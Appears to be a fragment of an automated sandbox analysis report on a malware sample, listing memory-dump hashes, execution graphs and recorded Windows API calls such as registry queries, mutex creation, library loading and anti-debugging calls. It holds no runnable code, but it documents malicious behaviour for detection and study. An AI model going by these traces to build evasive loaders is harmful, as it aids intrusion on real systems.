                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c6c04facf7fb2d7d8b1b38c1efeb0a0a7bc062ea3075f2b863e4a23f95b2be87
                                  • Instruction ID: 846d0599b74dac56eeecebc330f81b9c5c1ea91ceb700d4ca30ffde8960a3157
                                  • Opcode Fuzzy Hash: c6c04facf7fb2d7d8b1b38c1efeb0a0a7bc062ea3075f2b863e4a23f95b2be87
                                  • Instruction Fuzzy Hash: F1A168B174030A6FFB215E24CD86BEA376BEF56350F544228FE44A71C1C7B99888B740
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoadMemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 3389902171-0
                                  • Opcode ID: 5c26341aa8f10338cf57669b83da95fb2960708d1176b5b9c74d93ace4facdde
                                  • Instruction ID: 392371d2e290a5de4da744febd869d614db97fb6741a5274895877777245a725
                                  • Opcode Fuzzy Hash: 5c26341aa8f10338cf57669b83da95fb2960708d1176b5b9c74d93ace4facdde
                                  • Instruction Fuzzy Hash: 7581A470F083429EDF25DE2888D4755BAD19F62370F4882ADCD968B2D7E3758442E722
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6b0ad40354aa7490124a58e7620738842b7f8dd1229dc5e7a5102532bc5f98c4
                                  • Instruction ID: 63ef1cd3f2dbd4ea04451e465c30ce43b3c805be8753609f8638e4e862f5a60f
                                  • Opcode Fuzzy Hash: 6b0ad40354aa7490124a58e7620738842b7f8dd1229dc5e7a5102532bc5f98c4
                                  • Instruction Fuzzy Hash: 00E06D3E3102008FC314CA28C9C4F55B3A1AB593A0F254555E9818B2E9CA34EC41F610
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fe73df34f80c548d7f38e4da902f382a4500c5c07af9d1c34425ce2ab83f480e
                                  • Instruction ID: 69ca0ad0998cba72f24453d1fa79299cab4a71c97103bf1c9cf6a5a198bfed4e
                                  • Opcode Fuzzy Hash: fe73df34f80c548d7f38e4da902f382a4500c5c07af9d1c34425ce2ab83f480e
                                  • Instruction Fuzzy Hash: 32C04CB6240481CFEF55DA08C891B947361B769744BD944D0E046CBA95C318ED41DA00
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7a8975aa85ffa681981e648174b86ff935b29160b824c6080d71e9c0c58d4292
                                  • Instruction ID: b933d7a8f0b1c7a96fb1429829bcf9fa5e697247fe5bddf5ae2b1ed24a185623
                                  • Opcode Fuzzy Hash: 7a8975aa85ffa681981e648174b86ff935b29160b824c6080d71e9c0c58d4292
                                  • Instruction Fuzzy Hash: 03B092313106408FCA51CE19C1D0F80B3E0BF00A40B8244A4E00187A51C364E804C900
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d1985188533ae361fcbfaf6301ae5d8934191e8d79537ea20f659d31287449d5
                                  • Instruction ID: b36b371992250da8c45f1cd1506764a1d816c012ef71655a4cc1844282d2f311
                                  • Opcode Fuzzy Hash: d1985188533ae361fcbfaf6301ae5d8934191e8d79537ea20f659d31287449d5
                                  • Instruction Fuzzy Hash:
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Execution Graph

                                  Execution Coverage:26.3%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:29
                                  Total number of Limit Nodes:2

                                  Graph

                                  execution_graph 828 50f0047 829 50f0070 828->829 830 50f0087 829->830 831 50f00b9 2 API calls 829->831 831->830 832 113a35a 833 113a38e FindCloseChangeNotification 832->833 835 113a3c8 833->835 836 113a4aa 838 113a4de WriteFile 836->838 839 113a545 838->839 804 113a38e 805 113a3ba FindCloseChangeNotification 804->805 806 113a3f9 804->806 807 113a3c8 805->807 806->805 808 113a4de 810 113a513 WriteFile 808->810 811 113a545 810->811 812 50f0070 813 50f0087 812->813 815 50f00b9 812->815 816 50f00c5 815->816 817 50f011a 816->817 820 113a25e 816->820 824 113a23c 816->824 817->813 821 113a2b0 820->821 822 113a287 GetConsoleOutputCP 820->822 821->822 823 113a29c 822->823 823->817 825 113a25e GetConsoleOutputCP 824->825 827 113a29c 825->827 827->817

                                  Callgraph

                                  • Executed
                                  • Not Executed
                                  • Opacity -> Relevance
                                  • Disassembly available
                                  callgraph 0 Function_00856086 1 Function_01132310 2 Function_01132710 3 Function_0113A210 4 Function_01132194 5 Function_0113A09A 6 Function_01132098 7 Function_029C0710 8 Function_029C000C 9 Function_0113A407 10 Function_01132006 11 Function_0113A005 12 Function_050F0D19 17 Function_050F0D90 12->17 23 Function_050F0DA0 12->23 13 Function_029C0606 14 Function_0113A38E 15 Function_029C0002 16 Function_050F0710 36 Function_050F0CC8 16->36 17->17 17->23 18 Function_01132430 19 Function_029C05BF 20 Function_011322B4 21 Function_0113A43A 22 Function_008543AC 23->17 23->23 24 Function_011323BC 25 Function_0113213C 26 Function_0113A23C 27 Function_00856BB7 28 Function_0113A120 29 Function_050F0E3B 30 Function_050F00B9 30->26 41 Function_0113A25E 30->41 31 Function_050F01B7 31->13 31->16 31->31 35 Function_029C05DF 31->35 31->36 43 Function_050F0AC1 31->43 45 Function_029C0648 31->45 32 Function_0113A4AA 33 Function_0113A02E 34 Function_011320D0 36->12 37 Function_050F0047 37->13 37->30 37->31 37->35 37->45 53 Function_011323F4 37->53 38 Function_0113A35A 39 Function_00856D4F 40 Function_01132458 42 Function_0113A4DE 43->36 44 Function_029C05CF 59 Function_029C066A 45->59 46 Function_0113A2C7 47 Function_01132044 48 Function_0113A148 49 Function_0113A172 50 Function_050F02EE 51 Function_011321F0 52 Function_029C067F 54 Function_0113A1F4 55 Function_029C0074 56 Function_0113A078 57 Function_011324FC 58 Function_029C026D 60 Function_01132264 61 Function_01132364 62 Function_0113A2EE 63 Function_0085687B 64 Function_050F0070 64->13 64->30 64->31 64->35 64->45 64->53

                                  Executed Functions

                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24074442346.00000000050F0000.00000040.00000001.sdmp, Offset: 050F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_50f0000_anibtcent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b82abebe9a4b3d6a5e35ee93902062a59404021cc8cbe326cc96360b5dd55f62
                                  • Instruction ID: 6eda280f46b44ebd9b3992b5144409a7d52d54a97928b41ffc097586e83482ea
                                  • Opcode Fuzzy Hash: b82abebe9a4b3d6a5e35ee93902062a59404021cc8cbe326cc96360b5dd55f62
                                  • Instruction Fuzzy Hash: 2332C234704209DFDB18EF24E5A8A6EB7F3FF88300F148569D6469B656DB71E841CB90
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Control-flow Graph

                                  APIs
                                  • WriteFile.KERNELBASE(?,00000E2C,260ADA47,00000000,00000000,00000000,00000000), ref: 0113A53D
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24070163946.000000000113A000.00000040.00000001.sdmp, Offset: 0113A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_113a000_anibtcent.jbxd
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: 7a7f23b56fc261d4f61782e4dc0d2d488081a48e2205fdb7ee5c0754e1332c44
                                  • Instruction ID: a62bccc3e848b95e08a373406e242c59552dbc2e32928b2ad75e1987ffcd971a
                                  • Opcode Fuzzy Hash: 7a7f23b56fc261d4f61782e4dc0d2d488081a48e2205fdb7ee5c0754e1332c44
                                  • Instruction Fuzzy Hash: 3E2160715093806FD7228B659C84B96BFB8EF46210F08859BE9849B1A3D365A509CB71
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Control-flow Graph

                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 0113A3C0
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24070163946.000000000113A000.00000040.00000001.sdmp, Offset: 0113A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_113a000_anibtcent.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: 3abde9e919563c395dfa5d6a329b574c3e1dd5af08c8d49e6a24f24a81e31fd2
                                  • Instruction ID: 87714cabf8a589e0a3bd9096cb68c441f14ed147e8a1cf166d9b5b170afe1c76
                                  • Opcode Fuzzy Hash: 3abde9e919563c395dfa5d6a329b574c3e1dd5af08c8d49e6a24f24a81e31fd2
                                  • Instruction Fuzzy Hash: 6C21AF715093C09FD7128B25DC85792BFB4EF42220F0984EBED85CF263C278A948CB61
                                  Uniqueness

                                  Uniqueness Score: 0.13%

                                  Control-flow Graph

                                  APIs
                                  • WriteFile.KERNELBASE(?,00000E2C,260ADA47,00000000,00000000,00000000,00000000), ref: 0113A53D
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24070163946.000000000113A000.00000040.00000001.sdmp, Offset: 0113A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_113a000_anibtcent.jbxd
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: fe62f967c8858bb1c227c34ca0b7fc11b0b407452c316ec232bb7cec836fcc38
                                  • Instruction ID: 024b62690642d8c7c9ae614eaf85088113cda0e0b8584cdb7f2473722fd05b81
                                  • Opcode Fuzzy Hash: fe62f967c8858bb1c227c34ca0b7fc11b0b407452c316ec232bb7cec836fcc38
                                  • Instruction Fuzzy Hash: FF110472500340AFEB21DF55EC84BA6FBA8EF84320F04845AED85DB296C375A504CBB1
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Control-flow Graph

                                  APIs
                                  • GetConsoleOutputCP.KERNELBASE ref: 0113A28D
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24070163946.000000000113A000.00000040.00000001.sdmp, Offset: 0113A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_113a000_anibtcent.jbxd
                                  Similarity
                                  • API ID: ConsoleOutput
                                  • String ID:
                                  • API String ID: 3985236979-0
                                  • Opcode ID: 68e671d9fbed6bef47b3f2c6b789e1174bc38f8fdb197dd15df7c600c43209da
                                  • Instruction ID: 7935d82d8b08bd0e3ed31e273c3d5bca71f34c09e3bae6e2da761a0ed723b020
                                  • Opcode Fuzzy Hash: 68e671d9fbed6bef47b3f2c6b789e1174bc38f8fdb197dd15df7c600c43209da
                                  • Instruction Fuzzy Hash: 720180755097C49FC7128B55DC84B52FFA4EF46220F0980DAED858F263D279A948CBA2
                                  Uniqueness

                                  Uniqueness Score: 2.84%

                                  Control-flow Graph

                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 0113A3C0
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24070163946.000000000113A000.00000040.00000001.sdmp, Offset: 0113A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_113a000_anibtcent.jbxd
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: b1e500ce6273db27bc4dad71a07d932dcd62cb6ef073223e98408b356583ede6
                                  • Instruction ID: 8f773958c564545825fc1e3d4011cdbd2a6cc1d0c080148c5e8c98b567f23524
                                  • Opcode Fuzzy Hash: b1e500ce6273db27bc4dad71a07d932dcd62cb6ef073223e98408b356583ede6
                                  • Instruction Fuzzy Hash: 750184716042809FDB15CF59E889766FBA4DF84321F08C0ABDD49CB246D7B5A544CA62
                                  Uniqueness

                                  Uniqueness Score: 0.13%

                                  Control-flow Graph

                                  APIs
                                  • GetConsoleOutputCP.KERNELBASE ref: 0113A28D
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24070163946.000000000113A000.00000040.00000001.sdmp, Offset: 0113A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_113a000_anibtcent.jbxd
                                  Similarity
                                  • API ID: ConsoleOutput
                                  • String ID:
                                  • API String ID: 3985236979-0
                                  • Opcode ID: 22ed77aa28a0569e2aea4da7dae4b5e1c1d73b2fc4e1d48d4a2ee728a4510369
                                  • Instruction ID: fffcc47284dcdd7e8e19388592abe298bc5690387521b416c3822c0dd559dbfe
                                  • Opcode Fuzzy Hash: 22ed77aa28a0569e2aea4da7dae4b5e1c1d73b2fc4e1d48d4a2ee728a4510369
                                  • Instruction Fuzzy Hash: DEF0C2315047849FDB10CF45E888761FBA4DF85621F08C09ADD498F74AD77AA544CAA2
                                  Uniqueness

                                  Uniqueness Score: 2.84%

                                  Control-flow Graph

                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24074442346.00000000050F0000.00000040.00000001.sdmp, Offset: 050F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_50f0000_anibtcent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 061ceef60f6fdc251eb6d622335097e582d77972d28656a5c7e6d1185f16ac30
                                  • Instruction ID: eff4db0d22138909e8479be24e22894fc07b60b80ac22a742720689a1d35fe6d
                                  • Opcode Fuzzy Hash: 061ceef60f6fdc251eb6d622335097e582d77972d28656a5c7e6d1185f16ac30
                                  • Instruction Fuzzy Hash: 3F02A034B002159FCB18EB68D9A4A6EB7F2FFC8304F148569D51A9B356DB71EC41CBA0
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Control-flow Graph

                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24074442346.00000000050F0000.00000040.00000001.sdmp, Offset: 050F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_50f0000_anibtcent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 260b649790fa25de54f7279851ec8a7a7251e2e2dbce899050b6d3e8e9f26f27
                                  • Instruction ID: a240ec30e7ee37e4675be1de272b4cf62be477ea6d64e74dc9e03ae93d9519ca
                                  • Opcode Fuzzy Hash: 260b649790fa25de54f7279851ec8a7a7251e2e2dbce899050b6d3e8e9f26f27
                                  • Instruction Fuzzy Hash: DF213B347042009FCB59AB78D068A6D3BF6AFEA314B2445B9D016CF7A6DE36CC45CB91
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Control-flow Graph

                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24074442346.00000000050F0000.00000040.00000001.sdmp, Offset: 050F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_50f0000_anibtcent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 44de45788e7632063d160c8574f1baa077aa25bbfdad559145ca81bd6258e503
                                  • Instruction ID: 349d0df34fdbab325ed8c3fa73012d5c3f31a36e2085ea1cd1256a4090e8ce3a
                                  • Opcode Fuzzy Hash: 44de45788e7632063d160c8574f1baa077aa25bbfdad559145ca81bd6258e503
                                  • Instruction Fuzzy Hash: DF014530B102189BC308BBB8E82479D7BA9BFC6620F1480AAD4199B291CE749E05CB95
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Control-flow Graph

                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24070737096.00000000029C0000.00000040.00000040.sdmp, Offset: 029C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_29c0000_anibtcent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bc868b93385fc884ba98a1821e80f42acbeb22af54ad6b88a79e8fcc00270adc
                                  • Instruction ID: ceff1bd1737ccdc85dd03a7a790cb37ad0d69f48126fceff50e441a98ce28ebf
                                  • Opcode Fuzzy Hash: bc868b93385fc884ba98a1821e80f42acbeb22af54ad6b88a79e8fcc00270adc
                                  • Instruction Fuzzy Hash: B401F7724097809FC312CF16EC41852BFB8DF86630B1484AFD849CB652D635A808CBA2
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Control-flow Graph

                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24070737096.00000000029C0000.00000040.00000040.sdmp, Offset: 029C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_29c0000_anibtcent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fd37379c7bc78e6a7e14ff055c4d78c2e9b4571a2f7da3dceb36a889f09d44e6
                                  • Instruction ID: 44150c6f2c82b12d19725b29e9d14705d65ceb23137fe8cf83269e9e24a2e58e
                                  • Opcode Fuzzy Hash: fd37379c7bc78e6a7e14ff055c4d78c2e9b4571a2f7da3dceb36a889f09d44e6
                                  • Instruction Fuzzy Hash: 5101D6B550D3C46FD7128F16DC40862FFB8DE86530708C4DFEC898B652C125A909CB72
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Control-flow Graph

                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24074442346.00000000050F0000.00000040.00000001.sdmp, Offset: 050F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_50f0000_anibtcent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 249bbfde6cfb7e5c4ff5fb6221629cfb27952de86bf32bd738db89bdcd3d4091
                                  • Instruction ID: f0cd986636a6e7eded91613463ea41b2137fb28542f3e00827b9b5f49798281d
                                  • Opcode Fuzzy Hash: 249bbfde6cfb7e5c4ff5fb6221629cfb27952de86bf32bd738db89bdcd3d4091
                                  • Instruction Fuzzy Hash: CBF0EC7AA243489FCB15CF61E8945CDBFF9FE45120B0481A7E545C3602FA355641C760
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Control-flow Graph

                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24074442346.00000000050F0000.00000040.00000001.sdmp, Offset: 050F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_50f0000_anibtcent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 631f4087f62b42510177545c17fe083cc072c89e9c0dc359326d75b87c0367e6
                                  • Instruction ID: 3aec2bfc35c8d28453c8d892ec51d79d3fbeefede477c5c29676020f9786c12d
                                  • Opcode Fuzzy Hash: 631f4087f62b42510177545c17fe083cc072c89e9c0dc359326d75b87c0367e6
                                  • Instruction Fuzzy Hash: 67F0FA367042242BE70C6779A8146AE6AFAEBD9228F24003AE019CB394DE364C0183A0
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Control-flow Graph

                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24074442346.00000000050F0000.00000040.00000001.sdmp, Offset: 050F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_50f0000_anibtcent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 34b42d6b9db6138afb0a757910d0d84150208d3b79bc430854d661ba20e703ac
                                  • Instruction ID: afdfe6271e2aea61a233ffbfcf3a3ca7bef4f32fadfb7821d7337333b1572773
                                  • Opcode Fuzzy Hash: 34b42d6b9db6138afb0a757910d0d84150208d3b79bc430854d661ba20e703ac
                                  • Instruction Fuzzy Hash: 4BE0653A714219EF8B18DFA5F4484DEBBE9FA44561B108176E519C3104EA3155808754
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Control-flow Graph

                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24070737096.00000000029C0000.00000040.00000040.sdmp, Offset: 029C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_29c0000_anibtcent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1fa29b7b8513ad87b73379592fc27a5e4910fae2be694fc6ca7b3db1c7fab75a
                                  • Instruction ID: f447113be7cbac9e3043215f0e60f6119051efe19fdd75ce17759e2f5e3e9c8b
                                  • Opcode Fuzzy Hash: 1fa29b7b8513ad87b73379592fc27a5e4910fae2be694fc6ca7b3db1c7fab75a
                                  • Instruction Fuzzy Hash: FFE092B66046048BD650DF0AEC81462FBE8EBC4630B18C47FDC0D8B704D575B504CAA1
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24074442346.00000000050F0000.00000040.00000001.sdmp, Offset: 050F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_50f0000_anibtcent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 443dcaf4278bbb9a89c11722a322bde44a1416117a281ecfa0e5d5dec85a9d1f
                                  • Instruction ID: 0a2e6fb3e86d3430bc8fad3107d2e0848b3fd533c86caab74f82cfe0868108cd
                                  • Opcode Fuzzy Hash: 443dcaf4278bbb9a89c11722a322bde44a1416117a281ecfa0e5d5dec85a9d1f
                                  • Instruction Fuzzy Hash: E6E02B39250198DFD710DB74F018FA13BE9BB05620F1040ABD5298322BCB709884C7C0
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24074442346.00000000050F0000.00000040.00000001.sdmp, Offset: 050F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_50f0000_anibtcent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 812081e65b55e6565c98d49b4076d7e5e7c0563b90c6c5a64eaad000329c9268
                                  • Instruction ID: 72e5579e0b8a9f9b3c032f7c2d1c265f25edfb7afb175fbc47109e68b53a7cf4
                                  • Opcode Fuzzy Hash: 812081e65b55e6565c98d49b4076d7e5e7c0563b90c6c5a64eaad000329c9268
                                  • Instruction Fuzzy Hash: FED0A77960527493CB2497F6B8043DCBF78BB41920F54026ED959C7142FB125A2C83E2
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24070116792.0000000001132000.00000040.00000001.sdmp, Offset: 01132000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_1132000_anibtcent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e6e427aa1f989c471d884c9f11e852bb017f689268d1dda3d72e503bbc58b3fb
                                  • Instruction ID: d322876316abadef6189c20d57460131dc295c7e14c2d77f44464b2d55263f81
                                  • Opcode Fuzzy Hash: e6e427aa1f989c471d884c9f11e852bb017f689268d1dda3d72e503bbc58b3fb
                                  • Instruction Fuzzy Hash: B2D05E793056818FE31AAE1CC1A9B953FA4AB91B04F5644FAE8008B667C368E681D200
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 00000010.00000002.24070116792.0000000001132000.00000040.00000001.sdmp, Offset: 01132000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_16_2_1132000_anibtcent.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 275546e01e273bfe2c7d880ee90289591a517e7e25b6ae11e1235ba6fcc1084a
                                  • Instruction ID: 5bd3de1cb91b91396c8134f2f949e7113e737f42ecf90505f36818ec4fc8db1f
                                  • Opcode Fuzzy Hash: 275546e01e273bfe2c7d880ee90289591a517e7e25b6ae11e1235ba6fcc1084a
                                  • Instruction Fuzzy Hash: DED05E352442814BEB19EE0CC1D8F597BD4AB85B04F0644E8BC008B266C3B4D980C600
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Non-executed Functions

                                  Executed Functions

                                  Non-executed Functions

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.24230481090.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_21c0000_demisphereklediskene.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: p2#S
                                  • API String ID: 0-559888721
                                  • Opcode ID: b19cc858955087cea543e3bf5139ade1abf38dd807ac0e4cea38e9fcd72fd3b9
                                  • Instruction ID: ee09320729a991d068d46784f6fc47eb26baac0590f5af40159d4671a67d94ef
                                  • Opcode Fuzzy Hash: b19cc858955087cea543e3bf5139ade1abf38dd807ac0e4cea38e9fcd72fd3b9
                                  • Instruction Fuzzy Hash: 140144BA5983A38FD736AB38CD49AD43B20EB01690B604658D5504F2A3E361985BCFE0
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Memory Dump Source
                                  • Source File: 00000012.00000002.24230481090.00000000021C0000.00000040.00000001.sdmp, Offset: 021C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_21c0000_demisphereklediskene.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 57de28597d839a7ba814a9063e1b1ddec0595cef12b05119d96ced5d1b9c9648
                                  • Instruction ID: 6a9ba9ef6124f194d465a45a0cfe2e5a9feb6a7d987247f0a30ff88222f947c2
                                  • Opcode Fuzzy Hash: 57de28597d839a7ba814a9063e1b1ddec0595cef12b05119d96ced5d1b9c9648
                                  • Instruction Fuzzy Hash: BD2168BA9587969FE732CB38CC85BC4BB60EB45340B69468DC0804F283E726944BCA80
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Execution Graph

                                  Execution Coverage:7%
                                  Dynamic/Decrypted Code Coverage:3.3%
                                  Signature Coverage:68.4%
                                  Total number of Nodes:583
                                  Total number of Limit Nodes:4

                                  Graph

                                  execution_graph 8523 c32b50 8524 c32f69 TerminateThread 8523->8524 8526 c34bb7 8524->8526 8527 c32b4a 24 API calls 8526->8527 8529 c34bbc 8527->8529 8528 c38fc5 GetPEB 8528->8529 8529->8528 8530 c3a80b 8529->8530 8531 c3a810 8530->8531 8532 c32a91 24 API calls 8530->8532 8532->8531 8533 1d89a7ba 8535 1d89a7ef RegQueryValueExW 8533->8535 8536 1d89a843 8535->8536 7897 c34c66 7902 c34c80 CreateFileA 7897->7902 7899 c34c71 7903 c38799 7899->7903 7901 c38aa5 7902->7899 7904 c387ae GetPEB 7903->7904 7905 c387bc 7904->7905 7905->7901 7906 1d89b32e 7908 1d89b369 LoadLibraryA 7906->7908 7909 1d89b3a6 7908->7909 8537 1d89ba1e 8539 1d89ba44 GetFileSecurityW 8537->8539 8540 1d89ba6b 8539->8540 8541 1d89bade 8543 1d89bb16 CreateMutexW 8541->8543 8544 1d89bb59 8543->8544 8545 1d89a6b2 8548 1d89a6ea RegOpenKeyExW 8545->8548 8547 1d89a740 8548->8547 7910 c393ed 7911 c39402 7910->7911 7912 c381cf 7910->7912 7913 c3822b LoadLibraryA 7912->7913 7914 c38799 GetPEB 7912->7914 7915 c38235 7913->7915 7916 c381ed 7914->7916 7917 c38799 GetPEB 7916->7917 7918 c38219 7916->7918 7919 c38204 7917->7919 7918->7913 7919->7918 7920 c38799 GetPEB 7919->7920 7920->7918 7921 c3a30d 7924 c3a70f 7921->7924 7953 c3062c 7921->7953 7929 c3a7b1 7924->7929 7931 c3a7f4 7924->7931 7924->7953 7926 c30aae NtSetInformationThread 7927 c381cf 2 API calls 7926->7927 7927->7953 7928 c3a7d8 NtQueryInformationProcess 7928->7929 7929->7928 7929->7929 7929->7931 7930 c33189 7934 c3452b 7930->7934 8145 c39eee 7930->8145 7931->7931 7949 c381cf LoadLibraryA GetPEB 7949->7953 7951 c39eee 24 API calls 7951->7953 7952 c38a84 7955 c38799 GetPEB 7952->7955 7953->7930 7953->7949 